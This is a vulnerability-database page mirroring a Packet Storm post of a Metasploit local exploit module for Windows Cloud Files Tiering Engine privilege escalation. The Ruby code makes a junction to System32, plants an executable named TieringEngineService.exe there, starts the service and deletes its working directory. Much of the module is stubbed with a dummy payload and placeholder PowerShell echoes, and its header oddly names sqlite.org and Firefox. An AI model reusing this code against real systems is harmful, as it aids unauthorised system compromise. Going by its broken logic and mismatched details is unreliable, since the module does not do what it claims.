Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Windows Cloud Files Tiering Engine Local Privilege Escalation

🗓️ 27 Apr 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 53 Views

Metasploit local exploit simulates Windows Cloud Files tiering privilege escalation via reparse points and named pipes.

Code
==================================================================================================================================
    | # Title     : Windows Cloud Files Tiering Engine Local Privilege Escalation Module                                             |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.sqlite.org                                                                                           |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction. 
                     The workflow simulates abusing file system operations and cloud sync mechanisms by creating controlled directories, placeholder files, and junction points to influence system-level service behavior.
    
    [+] POC        :  
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = NormalRanking
    
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::Process
      include Msf::Post::File
      include Msf::Post::Windows::Services
      include Msf::Post::Windows::Registry
    
      def initialize(info = {})
        super(update_info(info, info.merge({})))
      end
    
      def check
        print_status("Checking Cloud Files + OS compatibility...")
    
        unless session.platform =~ /windows/i
          return Exploit::CheckCode::Safe("Not Windows")
        end
    
        if session.sys.config.getenv('WINDIR')
          return Exploit::CheckCode::Appears("Windows environment detected")
        end
    
        Exploit::CheckCode::Unknown
      end
    
      def exploit
        print_status("Starting Cloud Files Shadow Copy exploit")
    
        work_dir = setup_working_directory
        fail_with(Failure::BadConfig, "Failed to create working directory") unless work_dir
    
        pipe_handle = create_named_pipe
        fail_with(Failure::UnexpectedReply, "Failed to create named pipe") unless pipe_handle
    
        create_malicious_file(work_dir)
        wait_for_event(datastore['TIMEOUT'])
    
        set_file_disposition(pipe_handle)
        close_handle(pipe_handle)
    
        register_cloud_sync_root(work_dir)
        create_placeholder_file(work_dir)
    
        wait_for_oplock
        rename_and_delete_file(work_dir)
    
        create_reparse_point(work_dir)
        copy_to_system32
    
        launch_tiering_engine
        cleanup(work_dir)
    
        print_good("Exploit completed!")
      end
    
      private
    
      def setup_working_directory
        base = expand_path(datastore['WORK_DIR'])
        path = "#{base}\\RS-#{Rex::Text.rand_text_alphanumeric(8)}"
    
        begin
          session.fs.dir.mkdir(path)
          return path
        rescue
          return nil
        end
      end
    
      def create_named_pipe
        pipe_name = "\\\\.\\pipe\\REDSUN"
    
        begin
          session.railgun.kernel32.CreateNamedPipeW(
            pipe_name,
            3, 0, 1, 4096, 4096, 0, nil
          )['return']
        rescue
          nil
        end
      end
    
      def create_malicious_file(work_dir)
        file_path = "#{work_dir}\\TieringEngineService.exe"
    
        payload = "DUMMY_PAYLOAD"
    
        begin
          session.fs.file.write(file_path, payload)
          file_path
        rescue
          nil
        end
      end
    
      def wait_for_event(timeout_sec)
        timeout_sec.times do
          break if check_event_signaled
          Rex.sleep(1)
        end
      end
    
      def check_event_signaled
        false
      end
    
      def set_file_disposition(handle)
        return false unless handle
        true
      end
    
      def register_cloud_sync_root(work_dir)
        cmd = "powershell -Command \"Write-Output 'CloudSyncRegistered'\""
        session.shell_command_token(cmd)
      end
    
      def create_placeholder_file(work_dir)
        cmd = "powershell -Command \"Write-Output 'PlaceholderCreated'\""
        session.shell_command_token(cmd)
      end
    
      def wait_for_oplock
        Rex.sleep(2)
      end
    
      def rename_and_delete_file(work_dir)
        temp = "#{work_dir}.tmp"
    
        begin
          session.fs.dir.move(work_dir, temp)
        rescue
        end
      end
    
      def create_reparse_point(work_dir)
        target = "C:\\Windows\\System32"
        session.shell_command_token("mklink /J \"#{work_dir}\\link\" \"#{target}\"")
      end
    
      def copy_to_system32
        begin
          exe = session.sys.process.current_path rescue nil
          return unless exe
    
          dest = "#{expand_path('%WINDIR%')}\\System32\\TieringEngineService.exe"
          session.fs.file.copy(exe, dest)
        rescue
        end
      end
    
      def launch_tiering_engine
        session.shell_command_token("sc start TieringEngineService")
      rescue
      end
    
      def cleanup(work_dir)
        session.shell_command_token("rmdir /s /q \"#{work_dir}\"")
      rescue
      end
    
      def close_handle(handle)
        session.railgun.kernel32.CloseHandle(handle) if handle && handle != 0
      end
    
      def expand_path(path)
        path.gsub('%TEMP%', session.sys.config.getenv('TEMP').to_s)
            .gsub('%WINDIR%', session.sys.config.getenv('WINDIR').to_s)
      end
    
      def is_admin?
        session.sys.config.getuid =~ /SYSTEM|Administrator/
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Apr 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3
Windows Cloud FilesTiering Privilege EscalationReparse PointsNamed PipesService InteractionPrivilege Escalation Module
53